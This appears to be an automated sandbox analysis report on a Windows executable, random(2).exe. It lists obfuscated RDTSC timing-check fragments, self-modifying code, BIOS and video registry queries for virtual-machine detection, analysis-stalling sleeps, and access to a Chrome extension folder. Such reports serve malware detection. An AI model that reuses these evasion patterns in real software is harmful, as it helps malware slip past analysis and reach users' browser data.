              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F00E0 second address: 49F0148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov al, byte ptr [edx] 0x0000000d jmp 00007F29453582DCh 0x00000012 inc edx 0x00000013 pushad 0x00000014 mov ecx, 57B7393Dh 0x00000019 pushfd 0x0000001a jmp 00007F29453582DAh 0x0000001f jmp 00007F29453582E5h 0x00000024 popfd 0x00000025 popad 0x00000026 test al, al 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F29453582DCh 0x0000002f sub esi, 1837A578h 0x00000035 jmp 00007F29453582DBh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d mov al, F8h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0148 second address: 49F0148 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F294453553Bh 0x00000008 and ah, 0000003Eh 0x0000000b jmp 00007F2944535549h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 jne 00007F29445354A5h 0x0000001a mov al, byte ptr [edx] 0x0000001c jmp 00007F294453553Ch 0x00000021 inc edx 0x00000022 pushad 0x00000023 mov ecx, 57B7393Dh 0x00000028 pushfd 0x00000029 jmp 00007F294453553Ah 0x0000002e jmp 00007F2944535545h 0x00000033 popfd 0x00000034 popad 0x00000035 test al, al 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F294453553Ch 0x0000003e sub esi, 1837A578h 0x00000044 jmp 00007F294453553Bh 0x00000049 popfd 0x0000004a push eax 0x0000004b push edx 0x0000004c mov al, F8h 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F01F7 second address: 49F01FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F01FD second address: 49F0297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov al, byte ptr [edi+01h] 0x0000000e jmp 00007F2944535540h 0x00000013 inc edi 0x00000014 jmp 00007F2944535540h 0x00000019 test al, al 0x0000001b jmp 00007F2944535540h 0x00000020 jne 00007F29B5C2DD6Ah 0x00000026 jmp 00007F2944535540h 0x0000002b mov ecx, edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F294453553Dh 0x00000035 pushfd 0x00000036 jmp 00007F2944535540h 0x0000003b xor ecx, 4878D2D8h 0x00000041 jmp 00007F294453553Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0297 second address: 49F029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F029D second address: 49F02A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F02A1 second address: 49F030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 shr ecx, 02h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F29453582DDh 0x00000012 xor ax, 4276h 0x00000017 jmp 00007F29453582E1h 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 rep movsd 0x00000023 rep movsd 0x00000025 rep movsd 0x00000027 rep movsd 0x00000029 pushad 0x0000002a mov cx, 9A5Fh 0x0000002e pushfd 0x0000002f jmp 00007F29453582E4h 0x00000034 add cx, 96C8h 0x00000039 jmp 00007F29453582DBh 0x0000003e popfd 0x0000003f popad 0x00000040 mov ecx, edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F030C second address: 49F0327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F041E second address: 49F048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jmp 00007F29453582DCh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edi 0x0000000e jmp 00007F29453582E1h 0x00000013 pop esi 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 jmp 00007F29453582E8h 0x0000001c popad 0x0000001d pop ebx 0x0000001e jmp 00007F29453582E0h 0x00000023 leave 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007F29453582E3h 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F048C second address: 49F0491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E4155 second address: 5E4175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007F29453582D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E43BA second address: 5E43E5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F294453554Eh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E43E5 second address: 5E43EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E43EB second address: 5E43EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49C084F second address: 49C0856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49C0856 second address: 49C088E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop ecx 0x0000000b push edi 0x0000000c mov al, 36h 0x0000000e pop edx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F294453553Ch 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2944535547h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49C088E second address: 49C08BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29453582DDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49B00EC second address: 49B00F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0A63 second address: 49F0A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0A67 second address: 49F0A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0A83 second address: 49F0A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0A89 second address: 49F0A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0A8D second address: 49F0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007F29453582E9h 0x0000000e push 18F2E141h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F29453582DAh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0AC0 second address: 49F0B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 6E05E171h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2944535544h 0x00000017 adc ax, F4A8h 0x0000001c jmp 00007F294453553Bh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop ebx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0BE4 second address: 49F0C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 78h 0x00000005 mov edi, 761811E2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 mov ah, 5Fh 0x00000012 mov di, B792h 0x00000016 popad 0x00000017 pushad 0x00000018 mov bx, 478Ch 0x0000001c mov ecx, ebx 0x0000001e popad 0x0000001f popad 0x00000020 mov dword ptr [esp], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F29453582DAh 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0C13 second address: 49F0C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F294453553Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0C52 second address: 49F0C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0C58 second address: 49F0C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2944535542h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0D1F second address: 49F0D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0D23 second address: 49F0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [ebp-00000118h], eax 0x0000000d jmp 00007F294453553Eh 0x00000012 test eax, eax 0x00000014 jmp 00007F2944535540h 0x00000019 je 00007F29B6A878A9h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2944535547h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0D6F second address: 49F0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0D87 second address: 49F0DC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F2944535546h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ax, dx 0x00000016 mov dx, 8380h 0x0000001a popad 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DC0 second address: 49F0DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DC6 second address: 49F0DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DCC second address: 49F0DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DD0 second address: 49F0DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DD4 second address: 49F0DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebx+04h] 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 push 00000027h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F29453582E0h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DFA second address: 49F0E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2944535541h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F294453553Fh 0x00000017 sub ah, 0000001Eh 0x0000001a jmp 00007F2944535549h 0x0000001f popfd 0x00000020 mov ah, A3h 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00735 second address: 4A0076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 49FAh 0x00000007 jmp 00007F29453582DBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 movzx ecx, bx 0x00000015 mov eax, ebx 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F29453582DFh 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0076B second address: 4A0076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0076F second address: 4A00773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00773 second address: 4A00779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00779 second address: 4A00796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A004A3 second address: 4A004A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A004A8 second address: 4A004F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, B9A8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 pushfd 0x00000011 jmp 00007F29453582E8h 0x00000016 adc si, 2C08h 0x0000001b jmp 00007F29453582DBh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F29453582E0h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A004F8 second address: 4A004FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A004FC second address: 4A00502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00502 second address: 4A00508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00508 second address: 4A0050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0050C second address: 4A00510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00510 second address: 4A00535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F29453582E4h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00535 second address: 4A00539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00539 second address: 4A00556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00909 second address: 4A009DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2944535547h 0x00000009 or cx, D37Eh 0x0000000e jmp 00007F2944535549h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F294453553Dh 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushad 0x00000022 mov bx, si 0x00000025 call 00007F2944535546h 0x0000002a pop esi 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007F294453553Bh 0x00000032 add eax, 3AD8A2EEh 0x00000038 jmp 00007F2944535549h 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 jmp 00007F294453553Eh 0x00000046 mov ecx, dword ptr [ebp+08h] 0x00000049 jmp 00007F2944535540h 0x0000004e test ecx, ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F2944535547h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A009DF second address: 4A00A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov di, 9B36h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F29B68DA52Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F29453582E8h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00A0B second address: 4A00A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00A11 second address: 4A00A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00A15 second address: 4A00A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49C09C4 second address: 49C09C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49C09C8 second address: 49C09CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 42C955 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 42C9F6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 5D83D8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 5D86FA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 42A2F6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 66B584 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\random(2).exe TID: 6216Thread sleep count: 39 > 30Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exe TID: 6216Thread sleep time: -78039s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\random(2).exe TID: 6188Thread sleep count: 38 > 30Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exe TID: 6188Thread sleep time: -76038s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\random(2).exe TID: 6264Thread sleep count: 46 > 30Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exe TID: 6264Thread sleep time: -92046s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll]
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceY
              Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434425374.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2430756068.00000249D6721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root PartitionRH
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
              Source: chrome.exe, 0000000C.00000003.2433036035.00000249D9BB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor 